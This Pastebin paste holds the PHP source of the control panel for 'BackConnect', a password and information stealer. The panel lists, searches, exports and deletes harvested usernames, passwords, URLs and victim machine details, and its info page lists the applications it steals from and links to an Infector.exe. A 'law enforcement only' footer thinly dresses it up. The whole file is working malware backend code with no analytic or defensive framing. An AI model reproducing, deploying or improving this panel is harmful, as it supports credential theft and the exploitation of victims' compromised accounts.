API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 27th, 2017
128
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.50 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. include 'config.php';
  4.  
  5. // ********************************************************************************************
  6.  
  7. $html = "<html><head><title>BC Log Manager - ";
  8. $header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
  9. <div id='web'><div id='header'><b>Jak se máš ".$username."?</b></div><div id='navigation'><ul>
  10. <li><a href='?action=logs'>All Logs</a></li><li><a href='?action=search'>Search</a></li>
  11. <li><a href='?action=suspects'>Suspects</a></li>
  12. <li><a href='?action=export'>Export</a></li>
  13. <li><a href='?action=info'>Information</a></li>
  14. <li><a href='?action=logout'>Logout</a></li>
  15. </ul></div><br>";
  16. $footer = "<div id='footer'>(C) 2010 - FOR LAW ENFORCEMENTS ONLY. United States law applies.</div></div></body></html>";
  17. $searchform = "<form name='search' method='POST' action='?action=search'>
  18. Search for: <input type='text' name='q' size='20' value='".htmlspecialchars($_POST["q"])."'> In: <select name='in'>
  19. <option value='1' selected='selected'>Url</option><option value='2'>Username</option>
  20. <option value='3'>Password</option><option value='4'>Computer ID</option>
  21. <option value='5'>Date</option><option value='6'>IP</option></select>
  22. <input type='submit' value='Search' name='search'></form>";
  23. $exportform1 = "<form name='search' method='POST' action='?action=export'><select name='in'>";
  24. $exportform2 = "</select> <input type='submit' value='Export' name='Export'></form>";
  25. $loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
  26. <table id='logintable' cellpadding='2' cellspacing='0' border='0'>
  27. <tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
  28. <tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
  29. <tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
  30. $javascript = "<script language='javascript' type='text/javascript'>
  31. function CheckElements1() { chk = document.getElementsByName('sel1[]');
  32. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel1'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  33. function CheckElements2() { chk = document.getElementsByName('sel2[]');
  34. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel2'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  35. function ConfirmElements1() { chk = document.getElementsByName('sel1[]');
  36. for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
  37. alert('At least one option must be select.'); return false;}
  38. function ConfirmElements2() { chk = document.getElementsByName('sel2[]');
  39. for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
  40. alert('At least one option must be select.'); return false;}
  41. function ConfirmElements12() {
  42. chk1 = document.getElementsByName('sel1[]');
  43. chk2 = document.getElementsByName('sel2[]');
  44. for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
  45. for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
  46. alert('At least one option must be select.'); return false;
  47. }
  48. function ConfirmElements12Evidence() {
  49. chk1 = document.getElementsByName('sel1[]');
  50. chk2 = document.getElementsByName('sel2[]');
  51. for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return true; }}
  52. for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return true; }}
  53. alert('At least one option must be select.'); return false;
  54. }
  55. </script>";
  56. $cols = array("program", "url", "login", "pass", "compid", "date", "ip");
  57. $cols2 = array("compid", "os", "computer", "user", "install", "date", "ip", "country");
  58.  
  59. // FUNCTIONS ******************************************************************************
  60. function connect_database() {
  61. global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
  62. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  63. if (!$mysql) {
  64. $html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
  65. die($html);
  66. }
  67. if (!mysql_select_db($dbDatabase, $mysql)) {
  68. mysql_close($mysql);
  69. $html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
  70. die($html);
  71. }
  72. return $mysql;
  73. }
  74. function pages_number($logstotal, $logspage, $page, $site) {
  75. $pagesnumber = ceil($logstotal/$logspage);
  76. $temp = "Pages: ";
  77. for ($i=0; $i<$pagesnumber; $i++) {
  78. if ($_SESSION[$page] == $i)
  79. $temp .= " <span class='page1'>".$i."</span>";
  80. else
  81. $temp .= " <span class='page0'><a href='?action=".$site."&".$page."=".$i."'>".$i."</a></span>";
  82. }
  83. $temp .= " Results ".($_SESSION[$page]*$logspage)." - ".(($_SESSION[$page]*$logspage)+$logspage)." of about ".$logstotal;
  84. return $temp;
  85. }
  86. function sort_order() {
  87. if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  88. return $tmp;
  89. }
  90.  
  91. // LOGIN **************************************************************************************
  92. session_start();
  93. if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
  94. if ($_GET["action"] == "login") {
  95. if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
  96. session_start();
  97. $_SESSION["user"] = $username;
  98. $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
  99. $_SESSION["sort"] = 5;
  100. $_SESSION["sort2"] = 5;
  101. $_SESSION["order"] = 1;
  102. $_SESSION["page"] = 0;
  103. $_SESSION["page2"] = 0;
  104.  
  105. $mysql = connect_database();
  106. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  107. if (!$result) {
  108. $html .= "Database Error".$header."Table 'logs' not present, please run the installation script first.".$footer;
  109. die($html);
  110. }
  111. $result = mysql_query("SELECT COUNT(*) FROM `suspects`;", $mysql);
  112. if (!$result) {
  113. $html .= "Database Error".$header."Table 'suspects' not present, please run the installation script first.".$footer;
  114. die($html);
  115. }
  116. mysql_close($mysql);
  117. header("Location: ?action=logs");
  118. } else {
  119. $html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  120. echo $html;
  121. exit;
  122. }
  123. } else {
  124. $html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  125. echo $html;
  126. exit;
  127. }
  128. }
  129.  
  130. // LOGOUT ************************************************************************************
  131. if ($_GET["action"] == "logout") {
  132. unset($_SESSION["user"]);
  133. unset($_SESSION["ip"]);
  134. unset($_SESSION["sort"]);
  135. unset($_SESSION["sort2"]);
  136. unset($_SESSION["order"]);
  137. unset($_SESSION["page"]);
  138. unset($_SESSION["page2"]);
  139. session_unset();
  140. header("Location: index.php");
  141.  
  142. // LOGS **************************************************************************************
  143. } elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {
  144.  
  145. if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
  146. if ($_SESSION["sort"] == $_GET["sort"])
  147. if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
  148. }
  149.  
  150. $mysql = connect_database();
  151. $result = mysql_query("SELECT COUNT(*) FROM `logs` WHERE `program` != 14 ;", $mysql);
  152. $logstotal = mysql_result($result, 0);
  153. if ($logstotal > 0) {
  154. if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
  155. $_SESSION["page"] = $_GET["page"];
  156.  
  157. $result = mysql_query("SELECT * FROM `logs` WHERE `program` != 14 ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
  158. if (!$result) die(mysql_error());
  159.  
  160. $html .= "Logs".$header.$javascript."
  161. <form name='frm' method='POST' action='?action=selected'>
  162. <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  163. <td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url</a></td>
  164. <td><a href='?action=logs&sort=2'>Username</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
  165. <td><a href='?action=logs&sort=4'>Computer ID</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
  166. <td><a href='?action=logs&sort=6'>IP</a></td>
  167. <td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'></td></tr>";
  168. $i = 0;
  169. while ($row = mysql_fetch_array($result)) {
  170. if ($row["program"] != 14) { // dont display key info here
  171. $html .= "<tr class='";
  172. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  173. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  174. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  175. $html .= "<td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  176. $html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
  177. $i++;
  178. }
  179. }
  180. $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page", "logs").
  181. "</div><input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements1()) return false;'></div></form>".$footer;
  182. } else {
  183. $html .= "Logs".$header."No logs found!".$footer;
  184. }
  185. mysql_close($mysql);
  186. echo $html;
  187.  
  188. // SEARCH ************************************************************************************
  189. } elseif ($_GET["action"] == "search") {
  190. Search:
  191. if (isset($_GET["q"])) { $_POST["q"] = $_GET["q"]; $_POST["in"] = 4; /* for suspect-search link */ }
  192. if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
  193. $mysql = connect_database();
  194.  
  195. // list detailed info of suspect (if comp-id is given)
  196. if ($_POST["in"] == 4)
  197. {
  198. $result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` = '".mysql_real_escape_string($_POST["q"], $mysql)."';", $mysql);
  199. $result2 = mysql_query("SELECT * FROM `suspects` WHERE ".mysql_real_escape_string($cols[$_POST["in"]], $mysql)." = '".mysql_real_escape_string($_POST["q"], $mysql)."' ORDER BY date ASC;", $mysql);
  200. if (!$result1 || !$result2) die(mysql_error());
  201. if (mysql_num_rows($result1) == 0 && mysql_num_rows($result2) == 0)
  202. {
  203. $html .= "Search".$header.$searchform."<br>No results found!";
  204. die($html);
  205. }
  206. }
  207.  
  208. // otherwise normal search in logs table
  209. else
  210. {
  211. $result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` LIKE '%".mysql_real_escape_string($_POST["q"], $mysql)."%';", $mysql);
  212. if (!$result1) die(mysql_error());
  213. if (mysql_num_rows($result1) == 0)
  214. {
  215. $html .= "Search".$header.$searchform."<br>No results found!";
  216. die($html);
  217. }
  218. }
  219.  
  220. $html .= "Search".$header.$javascript.$searchform."<form name='frm' method='POST' action='?action=selected'>";
  221.  
  222. // display the suspects table
  223. if ($_POST["in"] == 4 && mysql_num_rows($result2) > 0) {
  224. $html .= "
  225. <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  226. <td>Computer ID</td><td>OS</td>
  227. <td>Computer</td><td>User</td>
  228. <td>Installation</td><td>Date</td>
  229. <td>IP</td><td>Country</td>
  230. <td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'>".
  231. "<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
  232. "<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
  233. "</td></tr>";
  234. $i = 0;
  235. while ($row = mysql_fetch_array($result2)) {
  236. $html .= "<tr class='";
  237. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  238. $html .= "'><td>".$row["compid"]."</td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
  239. $html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
  240. $html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
  241. $i++;
  242. }
  243. $html .= "</table><br>";
  244. }
  245.  
  246. // display the log table
  247. if (mysql_num_rows($result1) > 0) {
  248. $html .= "
  249. <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  250. <td>Program</td><td>Url</td>
  251. <td>Username</td><td>Password</td>
  252. <td>Computer ID</td><td>Date</td>
  253. <td>IP</td>
  254. <td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'>".
  255. "<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
  256. "<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
  257. "</td></tr>";
  258. $i = 0;
  259. while ($row = mysql_fetch_array($result1)) {
  260. $html .= "<tr class='";
  261. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  262. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  263. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  264. $html .= "<td>".$row["compid"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  265. $html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
  266. $i++;
  267. }
  268. $html .= "</table>";
  269. }
  270.  
  271. // page numbers and delete button
  272. $html .= "<div id='pages'><div id='numbers'>".mysql_num_rows($result1)." results for '".$_POST["q"]."'</div><div id='delete'>".
  273. "<input name='buttonact' type='submit' value='Export Evidence' onclick='if (!ConfirmElements12Evidence()) return false;'>&nbsp;".
  274. "<input name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements12()) return false;'>".
  275. "</div></div></form>";
  276.  
  277. $html .= $footer;
  278. mysql_close($mysql);
  279. } else {
  280. $html .= "Logs".$header.$searchform.$footer;
  281. }
  282. echo $html;
  283.  
  284. // SELECTED **************************************************************************************
  285. } elseif ($_GET["action"] == "selected") {
  286. if (isset($_POST["buttonact"])) {
  287.  
  288. // DELETE SELECTED ***********************************************************************
  289. if ($_POST["buttonact"] == "Delete Selected") {
  290.  
  291. // delete entries from logs table (selection 1)
  292. if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
  293. $mysql = connect_database();
  294. $query = "DELETE FROM `logs` WHERE";
  295. for ($i=0; $i<count($_POST["sel1"]); $i++) {
  296. if (is_numeric($_POST["sel1"][$i]))
  297. $query .= " `id` = ".mysql_real_escape_string($_POST["sel1"][$i], $mysql)." OR";
  298. }
  299. $query .= ';';
  300. $query = str_replace(' OR;', ';', $query);
  301. $result = mysql_query($query, $mysql);
  302. if (!$result) die(mysql_error());
  303. mysql_close($mysql);
  304. }
  305.  
  306. // delete entries from suspects table (selection 2)
  307. if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
  308. $mysql = connect_database();
  309. $query = "DELETE FROM `suspects` WHERE";
  310. for ($i=0; $i<count($_POST["sel2"]); $i++) {
  311. if (is_numeric($_POST["sel2"][$i]))
  312. $query .= " `id` = ".mysql_real_escape_string($_POST["sel2"][$i], $mysql)." OR";
  313. }
  314. $query .= ';';
  315. $query = str_replace(' OR;', ';', $query);
  316. $result = mysql_query($query, $mysql);
  317. if (!$result) die(mysql_error());
  318. mysql_close($mysql);
  319. }
  320.  
  321. if (isset($_POST["q"]) && isset($_POST["in"])) // return to search, suspects or logs
  322. // header("Location: ?action=search");
  323. goto Search; // fix me
  324. elseif (isset($_POST["sel2"]) && count($_POST["sel2"])!=0)
  325. header("Location: ?action=suspects");
  326. else
  327. header("Location: ?action=logs");
  328.  
  329. // EXPORT SELECTED ***********************************************************************
  330. } elseif ($_POST["buttonact"] == "Export Evidence" && isset($_POST["q"])) {
  331. header("Content-Type: text/plain");
  332. header("Content-Disposition: Attachment; filename=evidence ".$_POST["q"].".txt");
  333. header("Pragma: no-cache");
  334.  
  335. echo "\r\n BackConnect Password and Information Stealer\r\n Evidence Report\r\n ================================================\r\n";
  336.  
  337. // logs table
  338. if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
  339. $mysql = connect_database();
  340. $query = "SELECT * FROM `logs` WHERE";
  341. for ($i=0; $i<count($_POST["sel1"]); $i++) {
  342. if (is_numeric($_POST["sel1"][$i]))
  343. $query .= " `id` = ".$_POST["sel1"][$i]." OR";
  344. }
  345. $query .= ';';
  346. $query = str_replace(' OR;', ';', $query);
  347. $result = mysql_query($query, $mysql);
  348. if (!$result) die(mysql_error());
  349. echo "\r\n\r\n";
  350. while ($row = mysql_fetch_array($result)) {
  351. echo "Program: ".$aplications[$row['program']]."\r\n";
  352. echo "Url/Host: ".$row['url']."\r\n";
  353. echo "Login: ".$row['login']."\r\n";
  354. echo "Password: ".$row['pass']."\r\n";
  355. echo "Computer ID: ".$row['compid']."\r\n";
  356. echo "Date: ".$row['date']."\r\n";
  357. echo "IP: ".$row['ip']."\r\n";
  358. echo "----------------------------------------------------------\r\n";
  359. }
  360. mysql_close($mysql);
  361. }
  362.  
  363. // suspects table
  364. if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
  365. $mysql = connect_database();
  366. $query = "SELECT * FROM `suspects` WHERE";
  367. for ($i=0; $i<count($_POST["sel2"]); $i++) {
  368. if (is_numeric($_POST["sel2"][$i]))
  369. $query .= " `id` = ".$_POST["sel2"][$i]." OR";
  370. }
  371. $query .= ';';
  372. $query = str_replace(' OR;', ';', $query);
  373. $result = mysql_query($query, $mysql);
  374. if (!$result) die(mysql_error());
  375. echo "\r\n\r\n";
  376. while ($row = mysql_fetch_array($result)) {
  377. echo "Computer ID: ".$row['compid']."\r\n";
  378. echo "OS: ".$row['os']."\r\n";
  379. echo "Computer: ".$row['computer']."\r\n";
  380. echo "User: ".$row['user']."\r\n";
  381. echo "Installation: ".$installation[$row["install"]]."\r\n";
  382. echo "Date: ".$row['date']."\r\n";
  383. echo "IP: ".$row['ip']."\r\n";
  384. echo "Country: ".$row['country']."\r\n";
  385. echo "Host: ".$row['host']."\r\n";
  386. echo "----------------------------------------------------------\r\n";
  387. }
  388. mysql_close($mysql);
  389. }
  390.  
  391. }
  392.  
  393. }
  394.  
  395. // SUSPECTS **********************************************************************************
  396. } elseif ($_GET["action"] == "suspects") {
  397.  
  398. if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=7) {
  399. if ($_SESSION["sort2"] == $_GET["sort"])
  400. if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort2"] = $_GET["sort"];
  401. }
  402.  
  403. $mysql = connect_database();
  404. $result = mysql_query("SELECT COUNT(*) FROM suspects WHERE install <> ".$InstallCodeRestart.";", $mysql);
  405. $logstotal = mysql_result($result, 0);
  406. if ($logstotal > 0) {
  407. if (isset($_GET["page2"]) && is_numeric($_GET["page2"]) && $_GET["page2"]>=0 && $_GET["page2"]<=ceil($logstotal/$logspage))
  408. $_SESSION["page2"] = $_GET["page2"];
  409.  
  410. $result = mysql_query("SELECT * FROM suspects WHERE install <> ".$InstallCodeRestart." ORDER BY ".$cols2[$_SESSION["sort2"]]." ".sort_order()." LIMIT ".($logspage*$_SESSION["page2"])." , ".$logspage.";", $mysql);
  411. if (!$result) die(mysql_error());
  412.  
  413. $html .= "Suspects".$header.$javascript."
  414. <form name='frm' method='POST' action='?action=selected'>
  415. <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  416. <td><a href='?action=suspects&sort=0'>Computer ID</a></td><td><a href='?action=suspects&sort=1'>OS</a></td>
  417. <td><a href='?action=suspects&sort=2'>Computer</a></td><td><a href='?action=suspects&sort=3'>User</a></td>
  418. <td><a href='?action=suspects&sort=4'>Installation</a></td><td><a href='?action=suspects&sort=5'>Date</a></td>
  419. <td><a href='?action=suspects&sort=6'>IP</a></td><td><a href='?action=suspects&sort=7'>Country</a></td>
  420. <td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'></td></tr>";
  421. $i = 0;
  422. while ($row = mysql_fetch_array($result)) {
  423. $html .= "<tr class='";
  424. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  425. $html .= "'><td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
  426. $html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
  427. $html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
  428. $i++;
  429. }
  430. $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page2", "suspects")."</div>".
  431. "<input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements2()) return false;'></div></form>".$footer;
  432. } else {
  433. $html .= "Suspects".$header."No suspects found!".$footer;
  434. }
  435. mysql_close($mysql);
  436. echo $html;
  437.  
  438. // EXPORT ************************************************************************************
  439. } elseif ($_GET["action"] == "export") {
  440.  
  441. if (isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"] < $ApplicationCount) {
  442. $mysql = connect_database();
  443. $query = "SELECT * FROM `logs` WHERE `program` =".mysql_real_escape_string($_POST["in"], $mysql).";";
  444. $result = mysql_query($query, $mysql);
  445. if (!$result) die(mysql_error());
  446. header("Content-Type: text/plain");
  447. header("Content-Disposition: Attachment; filename=log ".$aplications[$_POST["in"]].".txt");
  448. header("Pragma: no-cache");
  449. while ($row = mysql_fetch_array($result)) {
  450. echo "Program: ".$aplications[$row['program']]."\r\n";
  451. echo "Url/Host: ".$row['url']."\r\n";
  452. echo "Login: ".$row['login']."\r\n";
  453. echo "Password: ".$row['pass']."\r\n";
  454. echo "Computer ID: ".$row['compid']."\r\n";
  455. echo "Date: ".$row['date']."\r\n";
  456. echo "IP: ".$row['ip']."\r\n";
  457. echo "----------------------------------------------------------\r\n";
  458. }
  459. mysql_close($mysql);
  460. $mysql = connect_database();
  461.  
  462. mysql_close($mysql);
  463. } else {
  464. for ($i = 0; $i < $ApplicationCount; $i++)
  465. $exportform1 .= "<option value='".$i."'>".$aplications[$i]."</option>";
  466. $html .= "Logs".$header.$exportform1.$exportform2.$footer;
  467. echo $html;
  468. }
  469.  
  470. // INFORMATION **********************************************************************************
  471. } elseif ($_GET["action"] == "info") {
  472.  
  473. $html .= "Information".$header;
  474. $html .= "Version: 1.3<br>Date: -<br><br>This is BackConnect. ".
  475. "For any questions and upgrades, please contact -. This copy is registered to: - Click on a computer id to show the complete collected evidence.<br><br>".
  476. "It steals following information:<br>* MSN<br>* Google Talk<br>* Trillian<br>* Pidgin<br>".
  477. "* Paltalk<br>* Steam<br>* No-IP<br>* DynDNS<br>* Firefox (all versions)<br>* Internet Explorer (unreliable)<br>".
  478. "* FileZilla<br>* FlashFXP<br>* Keys from various games and software<br>* Outlook (old versions)<br>* IMVU<br>* Internet Download Manager<br>* Chrome (< 2010)".
  479. "<br>* RapidShare Downloader<br>* SmartFTP<br>* CoreFTP<br>* FTP Commander<br>* Total Commander<br>* Protected Storage<br><br>".
  480. "For further information and legal information please read the readme.<br><br>".
  481. "<a href='/downloads/Infector.exe'>Link to your Infector.exe</a><br><a href='/downloads/Disinfector.exe'>Link to your Disinfector.exe</a><br><br>";
  482. $html .= $footer;
  483. echo $html;
  484.  
  485. // Unknown ***********************************************************************************
  486. } else {
  487. $html .= $header.$footer;
  488. echo $html;
  489. }
  490. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!